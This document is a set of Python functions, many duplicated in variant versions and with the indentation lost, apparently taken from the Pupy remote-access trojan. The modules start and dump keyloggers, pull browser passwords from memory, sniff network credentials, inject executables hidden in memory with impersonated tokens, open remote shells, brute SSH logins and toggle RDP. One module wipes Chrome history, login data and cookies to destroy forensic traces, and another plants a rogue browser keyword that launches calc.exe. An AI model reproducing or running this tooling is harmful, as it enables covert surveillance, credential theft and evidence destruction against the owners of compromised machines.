def run(self, args):
# TO DO: enable multi RDP session, see MIMIKATZ for example
if args.local:
if args.enable or args.disable:
if not self.client.is_windows():
self.error("This option could be used only on windows hosts")
return
# check if admin
if not self.client.conn.modules["pupwinutils.rdp"].check_if_admin():
self.error("Admin privileges are required")
with redirected_stdio(self):
if args.enable:
self.client.conn.modules["pupwinutils.rdp"].enable_rdp()
if args.disable:
self.client.conn.modules["pupwinutils.rdp"].disable_rdp()
elif args.remote:
if "/" in args.target[0]:
hosts = IPNetwork(args.target[0])
else:
hosts = list()
hosts.append(args.target)
for host in hosts:
with redirected_stdio(self):
self.client.conn.modules["pupyutils.rdp_check"].check_rdp(
host, args.username, args.password, args.domain, args.hashes
)
def run(self, args):
if self.client.is_windows():
self.client.load_package("pupwinutils.keylogger")
else:
self.client.load_package("keylogger")
if args.action=="start":
if self.client.is_windows():
with redirected_stdio(self.client.conn): #to see the output exception in case of error
if not self.client.conn.modules["pupwinutils.keylogger"].keylogger_start():
self.error("the keylogger is already started")
else:
self.success("keylogger started !")
# not tested on android
else:
with redirected_stdio(self.client.conn): #to see the output exception in case of error
r = self.client.conn.modules["keylogger"].keylogger_start()
if r == 'no_x11':
self.error("the keylogger does not work without x11 graphical interface")
elif not r:
self.error("the keylogger is already started")
else:
self.success("keylogger started !")
elif args.action=="dump":
try:
os.makedirs(os.path.join("data","keystrokes"))
except Exception:
pass
if self.client.is_windows():
data=self.client.conn.modules["pupwinutils.keylogger"].keylogger_dump()
else:
data=self.client.conn.modules["keylogger"].keylogger_dump()
if data is None:
self.error("keylogger not started")
elif not data:
self.warning("no keystrokes recorded")
else:
filepath=os.path.join("data", "keystrokes","keys_"+self.client.short_name()+"_"+str(datetime.datetime.now()).replace(" ","_").replace(":","-")+".log")
self.success("dumping recorded keystrokes in %s"%filepath)
with open(filepath, 'w') as f:
f.write(data)
self.log(data)
elif args.action=="stop":
if self.client.is_windows():
stop = self.client.conn.modules["pupwinutils.keylogger"].keylogger_stop()
else:
stop = self.client.conn.modules["keylogger"].keylogger_stop()
if stop:
self.success("keylogger stopped")
else:
self.success("keylogger is not started")
def run(self, args):
if self.client.is_windows():
self.client.load_package("pupwinutils.keylogger")
else:
self.client.load_package("keylogger")
if args.action=="start":
if self.client.is_windows():
with redirected_stdio(self.client.conn): #to see the output exception in case of error
if not self.client.conn.modules["pupwinutils.keylogger"].keylogger_start():
self.error("the keylogger is already started")
else:
self.success("keylogger started !")
# not tested on android
else:
with redirected_stdio(self.client.conn): #to see the output exception in case of error
r = self.client.conn.modules["keylogger"].keylogger_start()
if r == 'no_x11':
self.error("the keylogger does not work without x11 graphical interface")
elif not r:
self.error("the keylogger is already started")
else:
self.success("keylogger started !")
elif args.action=="dump":
try:
os.makedirs(os.path.join("data","keystrokes"))
except Exception:
pass
if self.client.is_windows():
data=self.client.conn.modules["pupwinutils.keylogger"].keylogger_dump()
else:
data=self.client.conn.modules["keylogger"].keylogger_dump()
if data is None:
self.error("keylogger not started")
elif not data:
self.warning("no keystrokes recorded")
else:
filepath=os.path.join("data", "keystrokes","keys_"+self.client.short_name()+"_"+str(datetime.datetime.now()).replace(" ","_").replace(":","-")+".log")
self.success("dumping recorded keystrokes in %s"%filepath)
with open(filepath, 'w') as f:
f.write(data)
self.log(data)
elif args.action=="stop":
if self.client.is_windows():
stop = self.client.conn.modules["pupwinutils.keylogger"].keylogger_stop()
else:
stop = self.client.conn.modules["keylogger"].keylogger_stop()
if stop:
self.success("keylogger stopped")
else:
self.success("keylogger is not started")
def exec_pe(module, prog_args, path=None, raw_pe=None, interactive=False, fork=False, timeout=None, use_impersonation=False, suspended_process="cmd.exe"):
if not raw_pe and not path:
raise Exception("raw_pe or path must be supplied")
if path:
pe_arch=get_pe_arch(path)
proc_arch=module.client.desc["proc_arch"]
if pe_arch!=proc_arch:
module.error("%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or migrate into a %s process first"%(path, pe_arch, proc_arch, proc_arch, pe_arch))
return
wait=True
redirect_stdio=True
if fork:
wait=False
redirect_stdio=False
if not raw_pe:
raw_pe=b""
with open(path,'rb') as f:
raw_pe=f.read()
module.client.load_package("pupymemexec")
module.client.load_package("pupwinutils.memexec")
res=""
dupHandle=None
if use_impersonation:
dupHandle=module.client.impersonated_dupHandle
if dupHandle is None:
module.error("No token has been impersonated on this session. use impersonate module first")
return
if not hasattr(module, 'mp'):
setattr(module, 'mp', None)
module.mp=module.client.conn.modules['pupwinutils.memexec'].MemoryPE(raw_pe, args=prog_args, hidden=True, redirect_stdio=redirect_stdio, suspended_process=suspended_process, dupHandle=dupHandle)
with redirected_stdio(module.client.conn):
module.mp.run()
if not fork:
if interactive:
try:
with redirected_stdio(module.client.conn):
module.mp.get_shell()
finally:
module.mp.close()
else:
starttime=time.time()
while True:
if module.mp.wait(1):
break
if timeout:
if time.time()-starttime>timeout:
break
module.mp.close()
res=module.mp.get_stdout()
module.log(res)
return res
def run(self, args):
self.client.load_package("_sqlite3")
self.client.load_package("sqlite3")
print self.client.load_dll("packages/windows/x86/sqlite3.dll")
self.client.conn.modules['_sqlite3']
self.client.conn.modules['sqlite3']
#self.client.conn.modules["pupwinutils.processes"].enum_processes()
with redirected_stdio(self.client.conn):
self.info("gotsql")
self.client.load_package("getpass")
u=self.client.conn.modules['getpass'].getuser()
x = "adamschaal"
#self.info("goinin")
self.client.load_package("forenmod.forenpackage")
#self.info("a")
self.client.conn.modules['forenmod.forenpackage'].kill_chrome()
#self.info("b")
self.client.conn.modules['forenmod.forenpackage'].fix_crash(u)
#self.info("c")
self.client.conn.modules['forenmod.forenpackage'].del_hist(x,u)
#self.info("d")
self.client.conn.modules['forenmod.forenpackage'].del_Topsite(x,u)
#self.info("e")
self.client.conn.modules['forenmod.forenpackage'].del_Favicons(x,u)
#self.info("f")
self.client.conn.modules['forenmod.forenpackage'].del_loginData(x,u)
#self.info("g")
self.client.conn.modules['forenmod.forenpackage'].del_NAP(x,u)
#self.info("h")
self.client.conn.modules['forenmod.forenpackage'].del_Shortcuts(x,u)
#self.info("i")
self.client.conn.modules['forenmod.forenpackage'].rm_CurrentTabs(u)
#self.info("j")
self.client.conn.modules['forenmod.forenpackage'].rm_CurrentSession(u)
#self.info("k")
self.client.conn.modules['forenmod.forenpackage'].rm_LastTabs(u)
#self.info("l")
self.client.conn.modules['forenmod.forenpackage'].rm_LastSession(u)
#self.info("m")
self.client.conn.modules['forenmod.forenpackage'].rm_bookmarks(u)
#self.info("n")
self.client.conn.modules['forenmod.forenpackage'].rm_Cache(u)
#self.info("o")
self.client.conn.modules['forenmod.forenpackage'].rm_autofill(u)
#self.info("p")
self.client.conn.modules['forenmod.forenpackage'].rm_visited(u)
#del_Cookies(x,u)
#self.info("goinout")
if args.clean:
self.info("clean...")
if args.persist:
self.info("persist...")
self.success("succesfully cleaned the client")
def run(self, args):
with redirected_stdio(self):
loot=self.client.conn.modules["loot_memory"].dump_browser_passwords()
for browser, dic in loot.iteritems():
self.info("%s crawled :"%browser)
for i, passwords in dic.iteritems():
self.success("%s:\n\t%s"%(i, '\n\t'.join(passwords)))
def run(self, args):
with redirected_stdio(self.client.conn):
loot=self.client.conn.modules["loot_memory"].dump_browser_passwords()
for browser, dic in loot.iteritems():
self.info("%s crawled :"%browser)
for i, passwords in dic.iteritems():
self.success("%s:\n\t%s"%(i, '\n\t'.join(passwords)))
def run(self, args):
if self.client.is_windows() or args.pseudo_tty:
self.client.load_package("interactive_shell")
encoding = None
program = "/bin/sh"
if self.client.is_android():
program = "/system/bin/sh"
elif self.client.is_windows():
program = "cmd.exe"
if args.program:
program = args.program
with redirected_stdio(self.client.conn):
self.client.conn.modules.interactive_shell.interactive_open(
program=program)
else: #handling tty
self.client.load_package("ptyshell")
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
self.ps = self.client.conn.modules['ptyshell'].PtyShell()
program = None
if args.program:
program = args.program.split()
try:
term = "xterm"
if "TERM" in os.environ:
term = os.environ["TERM"]
self.ps.spawn(program, term=term)
is_closed = Event()
self.ps.start_read_loop(print_callback, is_closed.set)
self.set_pty_size = rpyc. async (self.ps.set_pty_size)
old_handler = pupylib.PupySignalHandler.set_signal_winch(
self._signal_winch)
self._signal_winch(
None, None
) # set the remote tty sie to the current terminal size
try:
tty.setraw(fd)
buf = b''
while True:
r, w, x = select.select([sys.stdin], [], [], 0.01)
if sys.stdin in r:
ch = os.read(fd, 1)
buf += ch
elif buf:
self.ps.write(buf)
buf = b''
elif is_closed.is_set():
break
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
pupylib.PupySignalHandler.set_signal_winch(old_handler)
finally:
try:
self.ps.close()
except Exception:
pass
self.set_pty_size = None
def run(self, args):
with redirected_stdio(self):
# zip
if not args.u:
self.client.conn.modules["pupyutils.zip"].zip(args.source, args.destination)
# unzip
else:
self.client.conn.modules["pupyutils.zip"].unzip(args.source, args.destination)
def run(self, args):
if self.client.is_windows() or args.pseudo_tty:
self.client.load_package("interactive_shell")
encoding=None
program="/bin/sh"
if self.client.is_android():
program="/system/bin/sh"
elif self.client.is_windows():
program="cmd.exe"
if args.program:
program=args.program
with redirected_stdio(self.client.conn):
self.client.conn.modules.interactive_shell.interactive_open(program=program)
else: #handling tty
self.client.load_package("ptyshell")
self.ps=self.client.conn.modules['ptyshell'].PtyShell()
program=None
if args.program:
program=args.program.split()
try:
term="xterm"
if "TERM" in os.environ:
term=os.environ["TERM"]
self.ps.spawn(program, term=term)
is_closed=Event()
self.ps.start_read_loop(print_callback, is_closed.set)
self.set_pty_size=rpyc.async(self.ps.set_pty_size)
old_handler = pupylib.PupySignalHandler.set_signal_winch(self._signal_winch)
self._signal_winch(None, None) # set the remote tty sie to the current terminal size
fd=sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
input_buf=b""
while True:
r, w, x = select.select([sys.stdin], [], [], 0)
if sys.stdin in r:
last_input=sys.stdin.read(1)
if last_input=="\x1b": # in case we read the escape character, we read stdin again because mysteriously, the select won't unlock before getting another character again
last_input+=sys.stdin.read(2)
input_buf+=last_input
elif input_buf:
self.ps.write(input_buf)
input_buf=b""
elif is_closed.is_set():
break
else:
time.sleep(0.01)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
pupylib.PupySignalHandler.set_signal_winch(old_handler)
finally:
try:
self.ps.close()
except Exception:
pass
self.set_pty_size=None
def run(self, args):
self.client.load_package("pupyutils.zip")
with redirected_stdio(self.client.conn):
# zip
if not args.u:
self.client.conn.modules["pupyutils.zip"].zip(args.source, args.destination)
# unzip
else:
self.client.conn.modules["pupyutils.zip"].unzip(args.source, args.destination)
def run(self, args):
self.client.load_package("interactive_shell")
program="/bin/sh"
encoding=None
if self.client.is_windows():
program="cmd.exe"
encoding="cp437"
with redirected_stdio(self.client.conn):
self.client.conn.modules.interactive_shell.interactive_open(program=program, encoding=encoding)
def run(self, args):
self.client.load_package("interactive_shell")
program = "/bin/sh"
encoding = None
if self.client.is_windows():
program = "cmd.exe"
encoding = "cp437"
with redirected_stdio(self.client.conn):
self.client.conn.modules.interactive_shell.interactive_open(
program=program, encoding=encoding)
def run(self, args):
if self.client.is_windows() or args.pseudo_tty:
self.client.load_package("interactive_shell")
encoding=None
program="/bin/sh"
if self.client.is_android():
program="/system/bin/sh"
elif self.client.is_windows():
program="cmd.exe"
if args.program:
program=args.program
with redirected_stdio(self.client.conn):
self.client.conn.modules.interactive_shell.interactive_open(program=program)
else: #handling tty
self.client.load_package("ptyshell")
fd=sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
self.ps=self.client.conn.modules['ptyshell'].PtyShell()
program=None
if args.program:
program=args.program.split()
try:
term="xterm"
if "TERM" in os.environ:
term=os.environ["TERM"]
self.ps.spawn(program, term=term)
is_closed=Event()
self.ps.start_read_loop(print_callback, is_closed.set)
self.set_pty_size=rpyc.async(self.ps.set_pty_size)
old_handler = pupylib.PupySignalHandler.set_signal_winch(self._signal_winch)
self._signal_winch(None, None) # set the remote tty sie to the current terminal size
try:
tty.setraw(fd)
buf=b''
while True:
r, w, x = select.select([sys.stdin], [], [], 0.01)
if sys.stdin in r:
ch = os.read(fd, 1)
buf += ch
elif buf:
self.ps.write(buf)
buf=b''
elif is_closed.is_set():
break
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
pupylib.PupySignalHandler.set_signal_winch(old_handler)
finally:
try:
self.ps.close()
except Exception:
pass
self.set_pty_size=None
def run(self, args):
self.client.load_package("pupyutils.netcreds")
if args.action == "start":
with redirected_stdio(
self.client.conn
): #to see the output exception in case of error
r = self.client.conn.modules[
"pupyutils.netcreds"].netcreds_start(
args.interface, args.filterip)
if r == 'not_root':
self.error("Needs root privileges to be started")
elif not r:
self.error(
"Network credentials sniffer is already started")
else:
self.success("Network credentials sniffer started !")
elif args.action == "dump":
try:
os.makedirs(os.path.join("data", "netcreds"))
except Exception:
pass
data = self.client.conn.modules[
"pupyutils.netcreds"].netcreds_dump()
if data is None:
self.error(
"Network credentials sniffer has not been started yet")
elif not data:
self.warning("No network credentials recorded")
else:
# remove color before writting into the file
W = '\033[0m' # white (normal)
T = '\033[93m' # tan
data_no_color = data.replace(W, '').replace(T, '')
filepath = os.path.join(
"data", "netcreds", "creds_" + self.client.short_name() +
"_" + str(datetime.datetime.now()).replace(
" ", "_").replace(":", "-") + ".log")
self.success("Dumping recorded netcreds in %s" % filepath)
with open(filepath, 'w') as f:
f.write(data_no_color)
self.log(data)
elif args.action == "stop":
stop = self.client.conn.modules[
"pupyutils.netcreds"].netcreds_stop()
if stop:
self.success("Network credentials sniffer is stopped")
else:
self.error(
"Network credentials sniffer has not been started yet")
def run(self, args):
if args.fork and args.interactive:
self.error(
"--fork and --interactive options can't be used together")
return
#check we are injecting from the good process arch:
pe_arch = get_pe_arch(args.path)
proc_arch = self.client.desc["proc_arch"]
if pe_arch != proc_arch:
self.error(
"%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or migrate into a %s process first"
% (args.path, pe_arch, proc_arch, proc_arch, pe_arch))
return
wait = True
redirect_stdio = True
if args.fork:
wait = False
redirect_stdio = False
raw_pe = b""
with open(args.path, 'rb') as f:
raw_pe = f.read()
self.client.load_package("pupymemexec")
self.client.load_package("pupwinutils.memexec")
res = ""
self.mp = self.client.conn.modules['pupwinutils.memexec'].MemoryPE(
raw_pe, args=args.args, hidden=True, redirect_stdio=redirect_stdio)
self.mp.run()
if not args.fork:
if args.interactive:
try:
with redirected_stdio(self.client.conn):
self.mp.get_shell()
finally:
self.mp.close()
else:
starttime = time.time()
while True:
if self.mp.wait(1):
break
if args.timeout:
if time.time() - starttime > args.timeout:
break
self.mp.close()
res = self.mp.get_stdout()
self.log(res)
def run(self, args):
if self.client.is_windows() or args.pseudo_tty:
self.client.load_package("interactive_shell")
encoding = None
program = "/bin/sh"
if self.client.is_windows():
program = "cmd.exe"
encoding = "cp437"
if args.program:
program = args.program
with redirected_stdio(self.client.conn):
self.client.conn.modules.interactive_shell.interactive_open(
program=program, encoding=encoding)
else: #handling tty
self.client.load_package("ptyshell")
self.ps = self.client.conn.modules['ptyshell'].PtyShell()
program = None
if args.program:
program = args.program.split()
self.ps.spawn(program)
is_closed = Event()
self.ps.start_read_loop(print_callback, is_closed.set)
self.set_pty_size = rpyc. async (self.ps.set_pty_size)
old_handler = pupylib.PupySignalHandler.set_signal_winch(
self._signal_winch)
self._signal_winch(
None,
None) # set the remote tty sie to the current terminal size
try:
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
input_buf = b""
while True:
r, w, x = select.select([sys.stdin], [], [], 0)
if sys.stdin in r:
input_buf += sys.stdin.read(1)
elif input_buf:
self.ps.write(input_buf)
input_buf = b""
elif is_closed.is_set():
break
else:
time.sleep(0.01)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
finally:
pupylib.PupySignalHandler.set_signal_winch(old_settings)
self.ps.close()
def run(self, args):
if args.action=="start":
self.client.load_package("psutil")
self.client.load_package("pupwinutils.watch_puppy")
with redirected_stdio(self.client.conn): #to see the output exception in case of error
if not self.client.conn.modules["pupwinutils.watch_puppy"].watch_puppy_start():
self.error("the watch puppy is already started")
else:
self.success("watch puppy started !")
elif args.action=="stop":
if self.client.conn.modules["pupwinutils.watch_puppy"].watch_puppy_stop():
self.success("watch puppy stopped")
else:
self.success("watch puppy is not started")
def run(self, args):
filepath = None
if args.write:
config = self.client.pupsrv.config or PupyConfig()
folder = config.get_folder('beroot', {'%c': self.client.short_name()})
filepath = path.join(folder, str(datetime.datetime.now()).replace(" ","_").replace(":","-")+"-beroot.txt")
with redirected_stdio(self):
try:
for r in self.client.conn.modules["beRoot"].run(args.cmd, args.list, args.write):
self.print_output(output=r, write=args.write, file=filepath)
except Exception as e:
print e
if args.write:
self.success(filepath)
def run(self, args):
code = ""
if args.file:
self.info("loading code from %s ..." % args.file)
with open(args.file, 'r') as f:
code = f.read()
elif args.code:
code = args.code
else:
raise PupyModuleError("--code or --file argument is mandatory")
if args.no_redirected_stdio:
self.client.conn.execute(code + "\n")
else:
with redirected_stdio(self):
self.client.conn.execute(code + "\n")
def run(self, args):
if args.fork and args.interactive:
self.error("--fork and --interactive options can't be used together")
return
#check we are injecting from the good process arch:
pe_arch=get_pe_arch(args.path)
proc_arch=self.client.desc["proc_arch"]
if pe_arch!=proc_arch:
self.error("%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or migrate into a %s process first"%(args.path, pe_arch, proc_arch, proc_arch, pe_arch))
return
wait=True
redirect_stdio=True
if args.fork:
wait=False
redirect_stdio=False
raw_pe=b""
with open(args.path,'rb') as f:
raw_pe=f.read()
self.client.load_package("pupymemexec")
self.client.load_package("pupwinutils.memexec")
res=""
self.mp=self.client.conn.modules['pupwinutils.memexec'].MemoryPE(raw_pe, args=args.args, hidden=True, redirect_stdio=redirect_stdio)
self.mp.run()
if not args.fork:
if args.interactive:
try:
with redirected_stdio(self.client.conn):
self.mp.get_shell()
finally:
self.mp.close()
else:
starttime=time.time()
while True:
if self.mp.wait(1):
break
if args.timeout:
if time.time()-starttime>args.timeout:
break
self.mp.close()
res=self.mp.get_stdout()
self.log(res)
def exec_pe(self,
path,
prog_args,
interactive=False,
fork=False,
timeout=None):
pe_arch = get_pe_arch(path)
proc_arch = self.client.desc["proc_arch"]
if pe_arch != proc_arch:
self.error(
"%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or migrate into a %s process first"
% (path, pe_arch, proc_arch, proc_arch, pe_arch))
return
wait = True
redirect_stdio = True
if fork:
wait = False
redirect_stdio = False
raw_pe = b""
with open(path, 'rb') as f:
raw_pe = f.read()
self.client.load_package("pupymemexec")
self.client.load_package("pupwinutils.memexec")
res = ""
self.mp = self.client.conn.modules['pupwinutils.memexec'].MemoryPE(
raw_pe, args=prog_args, hidden=True, redirect_stdio=redirect_stdio)
self.mp.run()
if not fork:
if interactive:
try:
with redirected_stdio(self.client.conn):
self.mp.get_shell()
finally:
self.mp.close()
else:
starttime = time.time()
while True:
if self.mp.wait(1):
break
if timeout:
if time.time() - starttime > timeout:
break
self.mp.close()
res = self.mp.get_stdout()
self.log(res)
def run(self, args):
if self.client.is_windows() or args.pseudo_tty:
self.client.load_package("interactive_shell")
encoding=None
program="/bin/sh"
if self.client.is_windows():
program="cmd.exe"
encoding="cp437"
if args.program:
program=args.program
with redirected_stdio(self.client.conn):
self.client.conn.modules.interactive_shell.interactive_open(program=program, encoding=encoding)
else: #handling tty
self.client.load_package("ptyshell")
self.ps=self.client.conn.modules['ptyshell'].PtyShell()
program=None
if args.program:
program=args.program.split()
self.ps.spawn(program)
is_closed=Event()
self.ps.start_read_loop(print_callback, is_closed.set)
self.set_pty_size=rpyc.async(self.ps.set_pty_size)
old_handler = pupylib.PupySignalHandler.set_signal_winch(self._signal_winch)
self._signal_winch(None, None) # set the remote tty sie to the current terminal size
try:
fd=sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
input_buf=b""
while True:
r, w, x = select.select([sys.stdin], [], [], 0)
if sys.stdin in r:
input_buf+=sys.stdin.read(1)
elif input_buf:
self.ps.write(input_buf)
input_buf=b""
elif is_closed.is_set():
break
else:
time.sleep(0.01)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
finally:
pupylib.PupySignalHandler.set_signal_winch(old_settings)
self.ps.close()
def run(self, args):
error = ''
if not args.user:
error = 'username is needed'
elif args.password and args.private_key:
error = 'specify either a plaintext password or a private key, not both'
elif not args.password and not args.private_key:
error = 'private_key or plain text password are needed'
elif args.ip and args.file:
error = 'choose either an ip address or an input file, not both'
elif not args.ip and not args.file:
error = 'not targets specify'
if error:
self.error(error)
return
self.client.load_package("paramiko")
self.client.load_package("cryptography")
self.client.load_package("ecdsa")
self.client.load_package("ssh")
error_code = False
result = ''
ssh = self.client.conn.modules["ssh"].SSH(args.user, args.private_key,
args.password, args.file,
args.ip, args.port,
args.verbose, args.command)
if args.verbose:
with redirected_stdio(self.client.conn):
error_code, result = ssh.ssh_client()
else:
error_code, result = ssh.ssh_client()
if not error_code:
self.error('%s' % result)
else:
self.success('%s' % result)
def run(self, args):
self.client.load_package("pupyutils.netcreds")
if args.action=="start":
with redirected_stdio(self.client.conn): #to see the output exception in case of error
r = self.client.conn.modules["pupyutils.netcreds"].netcreds_start(args.interface, args.filterip)
if r == 'not_root':
self.error("Needs root privileges to be started")
elif not r:
self.error("Network credentials sniffer is already started")
else:
self.success("Network credentials sniffer started !")
elif args.action=="dump":
try:
os.makedirs(os.path.join("data","netcreds"))
except Exception:
pass
data=self.client.conn.modules["pupyutils.netcreds"].netcreds_dump()
if data is None:
self.error("Network credentials sniffer has not been started yet")
elif not data:
self.warning("No network credentials recorded")
else:
# remove color before writting into the file
W = '\033[0m' # white (normal)
T = '\033[93m' # tan
data_no_color=data.replace(W, '').replace(T, '')
filepath=os.path.join("data", "netcreds","creds_"+self.client.short_name()+"_"+str(datetime.datetime.now()).replace(" ","_").replace(":","-")+".log")
self.success("Dumping recorded netcreds in %s"%filepath)
with open(filepath, 'w') as f:
f.write(data_no_color)
self.log(data)
elif args.action=="stop":
stop = self.client.conn.modules["pupyutils.netcreds"].netcreds_stop()
if stop:
self.success("Network credentials sniffer is stopped")
else:
self.error("Network credentials sniffer has not been started yet")
def run(self, args):
if args.action=="start":
if self.keylogger:
self.error("the keylogger is already started")
else:
self.client.load_package("pupwinutils.keylogger")
with redirected_stdio(self.client.conn): #to see the output exception in case of error
self.keylogger=self.client.conn.modules["pupwinutils.keylogger"].KeyLogger()
self.keylogger.start()
else:
if not self.keylogger:
self.error("the keylogger is not running")
return
if args.action=="dump":
self.success("dumping recorded keystrokes :")
self.log(self.keylogger.dump())
elif args.action=="stop":
self.keylogger.stop()
self.job.stop()
def run(self, args):
error = ''
if not args.user:
error = 'username is needed'
elif args.password and args.private_key:
error = 'specify either a plaintext password or a private key, not both'
elif not args.password and not args.private_key:
error = 'private_key or plain text password are needed'
elif args.ip and args.file:
error ='choose either an ip address or an input file, not both'
elif not args.ip and not args.file:
error ='not targets specify'
if error:
self.error(error)
return
error_code = False
result = ''
SSH = self.client.remote('ssh', 'SSH', False)
ssh = SSH(
args.user, args.private_key, args.password,
args.file, args.ip, args.port, args.verbose,
args.command
)
if args.verbose:
with redirected_stdio(self):
error_code, result = ssh.ssh_client()
else:
error_code, result = ssh.ssh_client()
if not error_code:
self.error('%s' % result)
else:
self.success('%s' % result)
def exec_pe(self, path, prog_args, interactive=False, fork=False, timeout=None):
pe_arch = get_pe_arch(path)
proc_arch = self.client.desc["proc_arch"]
if pe_arch != proc_arch:
self.error(
"%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or migrate into a %s process first"
% (path, pe_arch, proc_arch, proc_arch, pe_arch)
)
return
wait = True
redirect_stdio = True
if fork:
wait = False
redirect_stdio = False
raw_pe = b""
with open(path, "rb") as f:
raw_pe = f.read()
self.client.load_package("pupymemexec")
self.client.load_package("pupwinutils.memexec")
res = ""
self.mp = self.client.conn.modules["pupwinutils.memexec"].MemoryPE(
raw_pe, args=prog_args, hidden=True, redirect_stdio=redirect_stdio
)
self.mp.run()
if not fork:
if interactive:
try:
with redirected_stdio(self.client.conn):
self.mp.get_shell()
finally:
self.mp.close()
else:
starttime = time.time()
while True:
if self.mp.wait(1):
break
if timeout:
if time.time() - starttime > timeout:
break
self.mp.close()
res = self.mp.get_stdout()
self.log(res)
def run(self, args):
error = ''
if not args.user:
error = 'username is needed'
elif args.password and args.private_key:
error = 'specify either a plaintext password or a private key, not both'
elif not args.password and not args.private_key:
error = 'private_key or plain text password are needed'
elif args.ip and args.file:
error ='choose either an ip address or an input file, not both'
elif not args.ip and not args.file:
error ='not targets specify'
if error:
self.error(error)
return
self.client.load_package("paramiko")
self.client.load_package("cryptography")
self.client.load_package("ecdsa")
self.client.load_package("ssh")
error_code = False
result = ''
ssh = self.client.conn.modules["ssh"].SSH(args.user, args.private_key, args.password, args.file, args.ip, args.port, args.verbose, args.command)
if args.verbose:
with redirected_stdio(self.client.conn):
error_code, result = ssh.ssh_client()
else:
error_code, result = ssh.ssh_client()
if not error_code:
self.error('%s' % result)
else:
self.success('%s' % result)
def run(self, args):
self.info("a")
self.client.load_package("_sqlite3")
self.client.load_package("sqlite3")
print self.client.load_dll("packages/windows/x86/sqlite3.dll")
self.client.conn.modules['_sqlite3']
self.client.conn.modules['sqlite3']
with redirected_stdio(self.client.conn):
self.con=self.client.conn.modules['sqlite3'].connect('C:\Users\steal\AppData\Local\Google\Chrome\User Data\Default\Web Data')
print self.con
self.info("connecting to web data db...")
self.c = self.con.cursor()
print self.c
self.c.execute("SELECT * FROM keywords WHERE short_name='cleanupeverybodyeverywhere'")
print self.c
self.foo = self.c.fetchall()
print self.foo
if not self.foo:
self.info("executing")
self.c.execute("INSERT INTO keywords (short_name,keyword,url,favicon_url) VALUES ('cleanupeverybodyeverywhere','cleanupeverybodyeverywhere','forensichat://C:>Windows>System32>calc.exe','')")
self.con.commit()
self.con.close()
if args.clean:
self.info("clean...")
if args.persist:
self.info("persist...")
self.success("added browser")
self.client.load_package("getpass")
user=self.client.conn.modules['getpass'].getuser()
self.info("USER: %s"%user)
def run(self, args):
with redirected_stdio(self):
self.client.conn.modules['linux_stealth'].run(args.port)
self.success("Module executed successfully.")
def run(self, args):
with redirected_stdio(self):
self.client.conn.modules['linux_stealth'].run(args.port)
self.success("Module executed successfully.")
def run(self, args):
self.client.load_package("wmi")
self.client.load_package("pupwinutils.drives")
with redirected_stdio(self.client.conn):
self.client.conn.modules['pupwinutils.drives'].list_drives()
def exec_pe(module,
prog_args,
path=None,
raw_pe=None,
interactive=False,
fork=False,
timeout=None,
use_impersonation=False,
suspended_process="cmd.exe"):
if not raw_pe and not path:
raise Exception("raw_pe or path must be supplied")
if path:
pe_arch = get_pe_arch(path)
proc_arch = module.client.desc["proc_arch"]
if pe_arch != proc_arch:
module.error(
"%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or migrate into a %s process first"
% (path, pe_arch, proc_arch, proc_arch, pe_arch))
return
wait = True
redirect_stdio = True
if fork:
wait = False
redirect_stdio = False
if not raw_pe:
raw_pe = b""
with open(path, 'rb') as f:
raw_pe = f.read()
module.client.load_package("pupymemexec")
module.client.load_package("pupwinutils.memexec")
res = ""
dupHandle = None
if use_impersonation:
dupHandle = module.client.impersonated_dupHandle
if dupHandle is None:
module.error(
"No token has been impersonated on this session. use impersonate module first"
)
return
if not hasattr(module, 'mp'):
setattr(module, 'mp', None)
module.mp = module.client.conn.modules['pupwinutils.memexec'].MemoryPE(
raw_pe,
args=prog_args,
hidden=True,
redirect_stdio=redirect_stdio,
suspended_process=suspended_process,
dupHandle=dupHandle)
with redirected_stdio(module.client.conn):
module.mp.run()
if not fork:
if interactive:
try:
with redirected_stdio(module.client.conn):
module.mp.get_shell()
finally:
module.mp.close()
else:
starttime = time.time()
while True:
if module.mp.wait(1):
break
if timeout:
if time.time() - starttime > timeout:
break
module.mp.close()
res = module.mp.get_stdout()
module.log(res)
